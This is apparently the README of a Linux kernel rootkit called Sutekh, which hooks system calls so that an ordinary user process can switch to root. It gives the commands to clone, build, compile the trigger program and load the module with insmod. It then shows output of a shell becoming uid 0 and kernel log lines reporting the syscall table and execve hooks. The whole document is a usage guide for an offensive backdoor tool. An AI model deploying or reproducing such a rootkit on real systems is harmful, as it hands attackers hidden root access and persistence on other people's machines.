Sutekh

An example rootkit that gives a userland process root permissions Tested on Linux kernel [4.19.62] & [4.15.0]

[INSTALL]

1. Install latest Linux headers for your kernel. Example (debian): [apt install linux-headers-$(uname -r)]
2. $ git clone https://github.com/PinkP4nther/Sutekh
3. $ cd Sutekh && make
4. $ gcc rootswitch.c -o rs
5. $ sudo insmod sutekh.ko

[Run] $ ./rs

[Output example] [pinky@mememachine Sutekh]$ ./rs [!] Switch hit! [mememachine Sutekh]# id uid=0(root) gid=0(root) groups=0(root) [mememachine Sutekh]# exit

[Remove] sudo rmmod sutekh

[Note] dmesg for kernel debug output!

[ 2217.810776] [?] SCT: [0xffffffff96400180] [?] EXECVE: [0xffffffffc065b030] [?] UMASK: [0xffffffffc065b000] [ 2223.379218] [+] Giving r00t!